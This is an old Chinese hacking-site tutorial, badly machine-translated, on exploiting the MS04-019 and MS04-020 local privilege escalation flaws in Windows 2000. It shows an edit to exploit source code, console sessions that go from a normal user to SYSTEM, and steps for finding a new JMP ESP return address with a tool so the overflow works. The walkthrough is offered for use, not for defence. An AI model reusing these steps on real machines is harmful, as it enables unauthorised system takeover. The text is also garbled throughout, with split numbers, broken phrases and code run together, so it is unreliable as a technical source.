Modify the Exploit to experience a local elevation of Privilege fun-vulnerability warning-the black bar safety net

2008-11-05T00:00:00
ID MYHACK58:62200820949
Type myhack58
Reporter 佚名
Modified 2008-11-05T00:00:00

Description

Vulnerability is like 8 months of rain like a short month, it cropped up several! Each of the security sites are constantly in the headlines reported in the latest vulnerability message, the heat as much as the Olympics. But these loopholes, really can for newbies service is few and far between! Really want to own an early becoming a large bird. The good news is these vulnerabilities, MS04-0 1 9 and MS04-0 2 0 This two buffer overflow vulnerabilities can easily be we use(because of the vulnerability overflow tools are not universal, the light boy had to attach the source code, everyone had to press their own case, be modified! Inconvenience, please forgive) it.

TIPS: what is buffer overflow?

Buffer overflow(Buffer Overflow)is a computer security of Public Enemy number one, it was reported that a 5 0% or more of the security vulnerabilities and buffer-overflow related. C/C++language array subscript to access cross-border do not check, is to cause a buffer overflow problem of the root cause. Buffer overflows generally can be divided into two categories, one is a heap overflow(Heap Overflow);one is a stack overflow(Stack Overflow) on. MS04-0 2 0 vulnerability is the heap overflow.

MS04-0 1 9

Good! Let's look at MS04-0 1 9 the vulnerability and MS04-0 2 0 vulnerability Lushan true face! MS04-0 1 9 vulnerability is tool Manager vulnerability could allow code execution, vulnerability full name is Microsoft Utility Manager local elevation of privilege vulnerability, which for now Windows 2 0 0 0 system are valid, unless playing on the latest patch. Successful exploitation of this vulnerability attacker can completely control an affected system, including installing programs;view, change, or delete data;or create new accounts with full privileges.

This vulnerability can only be used for local elevation of Privilege, cannot be used for remote privilege elevation, really a pity! However Microsoft Utility Manager, which is Windows 2 0 0 0 the tools Manager is installed by default, so the impact range is very large! Although it can not be used to Remote the invasion of someone else's computer, but when you forget your administrator password, it can be put to use!

As is the rookie's sake, the Trojan is a big bird write good, unfortunately the Virus does not support Chinese, but not difficult to find, adding Chinese is not difficult.

Below we first to enjoy the transformation of the day soldiers artifact of fun. You need to modify the code:

lang[] = { { 0x0c,"Gestionnaire d'utilitaires","aide de Windows","Ouvrir" }, / French / { 0x09,"Utility manager","Windows Help","Open" }, / English / / * The “French”in the following language data set, the arrangement of paragraphs 1 2, and 1 2-in-1 6-ary is c.“ English”is ranked 9 in. So“Chinese”is 4! Draw Chinese the format is:“0x04,"utility Manager","Windows Help","open"},/ Chinese /”/ }; void print_lang(int id) { char lang_list[] = {"Neutral","Arabic","Bulgarian","Catalan","Chinese","Czech", "Danish","German","Greek","English","Spanish","Finnish", "French","Hebrew","Hungarian","Icelandic","italian", The code after modification is: lang[] = { { 0x0c,"Gestionnaire d'utilitaires","aide de Windows","Ouvrir" }, / French / { 0x09,"Utility manager","Windows Help","Open" },/ English / { 0x04,"utility Manager","Windows Help","open"},/ Chinese / The last step is to put the source code compiled with VC compile it in words is very simple, only takes a few clicks on the line, this part ignore it. Through the transformation of God's soldiers is finally born! So what? The use of the program: Microsoft Windows 2 0 0 0 [Version 5.00.2195] (C) copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami X\Chobit

You can see this Chobit user has only User permissions. But soon you can get the SYSTEM privileges! Well, we come on! Press WIN(that is, Ctrl and Alt in the middle of that)+U key combination, to start the“utility Manager”, and then in the CMD window run the We just modify the good God as soldiers. Then the program will prompt can not find a file, asking whether to manually find and run. We select“Yes”and input“CMD”, press“Open”, you can run another CMD! Take a look at this CMD to have anything special? Enter whoami, returns the information:

Microsoft Windows 2 0 0 0 [Version 5.00.2195]

(C) copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami

NT AUTHORITY\SYSTEM

Look! This CMD with SYSTEM privileges! Next want to do what to do! The entire exploit process is just step-by-step to obtain SYSTEM privileges. However, in the transformation of the heavenly host of God in this scene, we fully explore and play the Trojan writer left wisdom, it seems a bold attempt and innovation is still the hack must has qualities that the majority of newbies make good efforts Oh!

TIPS: on period black defense against this vulnerability had requested isno done a detailed analysis and offers his own to write the full Exploit, like the research vulnerability details or want to modify their own Trojan friends can look at on the period of the Black defense and that comes with the disc.

MS04-0 2 0

This vulnerability is Posix allows the implementation of the code, The full name is the Windows POSIX subsystem privilege elevation vulnerability, the impact now of all the Windows NT and Windows 2 0 0 0 system. Successful exploitation of this vulnerability attacker can completely control an affected system, including installing programs;view, change, or delete data;or create new accounts with full privileges.

TIPS: POSIX system? Vulnerability is how to produce?

Microsoft POSIX system consists of a Solution of the process is responsible for processing, Posix. exe running the program will be through the LPC and Solution communication, Solution process of the permission is SYSTEM. Unfortunately, the Posix. the exe is passed to the Solution of the data, if it contains a too long string will cause Solution a stack overflow, if carefully constructed these strings, it will give the SYSTEM permission control.

With MS04-0 1 9 vulnerabilities, MS04-0 2 0 vulnerability cannot be used for remote intrusion. But we will not give up any one able to get the SYSTEM permissions of the opportunities, besides the MS04-0 2 0 exploit very convenient because the Virus are large birds. We have to do is put the compiled Exploit and use. Well, we come together!

Now I'm a regular user login the computer and open a CMD window:

Microsoft Windows 2 0 0 0 [Version 5.00.2195]

(C) copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami

X\Chobit

Then enter the correct overflow program paths, using a simple parameter can be of the overflow:

C:\cd tools C:\tools\exploit.exe Microsoft Windows POSIX Subsystem Local Privilege Escalation Exploit(1 By bkbll (bkbll#cnhonker.net,bkbll#tom.com) http://www.cnhonker.com/

pax: illegal option--h Usage: pax -[cimopuvy] [-f archive] [-s replstr] [-t device] [pattern. pax-r [-cimopuvy] [-f archive] [-s replstr] [-t device] [patte pax-w [-adimuvy] [-b blocking] [-f archive] [-s replstr] [-t device] [-x format] [pathname...] pax-r-w [-ilmopuvy] [-s replstr] [pathname...] directory

For more information on pax syntax, see Command Reference Help in the Windows Help file. Remote addr:0x7ff90000 Microsoft Windows 2 0 0 0 [Version 5.00.2195] (C) copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami NT AUTHORITY\SYSTEM C:\WINNT\system32>

System permissions out, this exploit be easily?! But the light boy on another Windows 2 0 0 0, using the same method to get SYSTEM permissions, but no success. From the error message, it can be seen 0x796e9b53 instruction referenced memory cannot be“written to”. 0x796e9b53 not that the Exploit“#define RETADDR 0x796e9b53 //advapi32.dll jmp esp”? Now is definitely the Trojan problem!“msgstr""# define RETADDR 0x796e9b53 //advapi32.dll jmp esp”this sentence defines the overflow in the most critical of the“return address”. If the return address is incorrect, then, overflow will never succeed. Now can do is: first find out the correct return address, and then re-compile the overflow program.我们 可以 用 Jmpesp.exe(this is a SUNX wrote looking for Jmpesp tool)to help us find the Jmp esp instruction address. First create a new CMD window, input“jmpesp 1 advapi32.dll”(without the quotes) to:

Microsoft Windows 2 0 0 0 [Version 5.00.2195] (C) copyright 1985-2000 Microsoft Corp.

C:\tools>jmpesp 1 advapi32.dll jmpesp, written by sunx http://www.sunx.org

advapi32.dll BaseAddress:0x796d0000 0x796e7993 [JMP ESP] 0x796ec663 [JMP ESP] 0x796ec68b [JMP ESP] 0x796ee70f [CALL ESP] 0x796f8498 [PUSH ESP; RET]

LoadLibraryA: 0x77e705cf GetProAddress:0x77e6e6a9 WinExec: 0x77e69c1d ExitThread: 0x77e65f3b

C:\tools> See? We obtained from the output results need to the correct return address: 0x796e7993 [JMP ESP] 0x796ec663 [JMP ESP] 0x796ec68b [JMP ESP]

This is a light Chai to find the Jmp esp instruction address. There is simply no 0x796e9b53, no wonder the overflow fail. Find the cause, and now should modify the Exploit, and re-compile. The Exploit“#define RETADDR 0x796e9b53 //advapi32.dll jmp esp”to“#define RETADDR 0x796e7993 //advapi32.dll jmp esp”. Re-compile the Exploit, again using the normal permissions to run the Exploit can succeed, give the SYSTEM permission!

Note that this overflow program whether successful or not can only overflow once, because the call to Posix, Posix will be waiting for your own LPC Port reply, and in the Solution to use ExitThread()to exit. Lead Posix, the pax dead in there. Use Pskill, Kill off after, the Solution will be because of their own in the three LPC Port and wait and freeze. While the Solution can only be run once, Kill after can't run again, that is want to again overflow the computer must be restarted!

With the big birds are pre-programmed Virus after the use of the MS04-0 1 9 the vulnerability and MS04-0 2 0 vulnerability to obtain SYSTEM privileges is not a difficult task. But in the entire combat process feels get, the overflow after the success of joy is not from the Get SYSTEM permissions, but rather in the discovery and solve problems in the process. Although the light boy is just a rookie, but the light boy think hacking technology is in the discovery of new issues and dedication to solve problems slowly accumulated! Don't you think?